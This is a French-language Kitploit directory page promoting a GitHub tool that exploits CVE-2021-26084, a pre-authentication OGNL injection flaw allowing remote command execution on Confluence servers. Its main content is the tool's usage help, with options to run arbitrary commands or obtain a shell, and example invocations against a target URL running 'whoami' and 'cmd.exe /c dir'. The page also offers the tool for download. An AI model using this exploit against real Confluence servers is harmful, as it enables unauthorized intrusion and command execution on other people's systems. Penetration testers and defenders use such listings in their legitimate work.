Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-26084_Confluence — CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection 回显 | Kitploit
Outils/GitHubGitHub/prettyrecon/cve-2021-26084_confluence
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubprettyrecon/cve-2021-26084_confluence

CVE-2021-26084_Confluence

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection 回显

Voir le dépôt
13246il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-26084 - Confluence RCE avant authentification Injection OGNL

Utilisation

  • root@kitploit:~
    usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell]
    
    CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection
    
    optional arguments:
      -h, --help         show this help message and exit
      --url URL, -u URL  Target Url
      --cmd CMD, -c CMD  Command
      --shell            Get shell
    
  • root@kitploit:~
    python3 cve-2021-26084_confluence_rce.py -u http://target:8090 -c "whoami"
    

    1630484082986

  • root@kitploit:~
    python3 cve-2021-26084_confluence_rce.py -u http://target:8090 -c "cmd.exe /c dir"
    

    1630484112292

Référence :

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Télécharger l’outil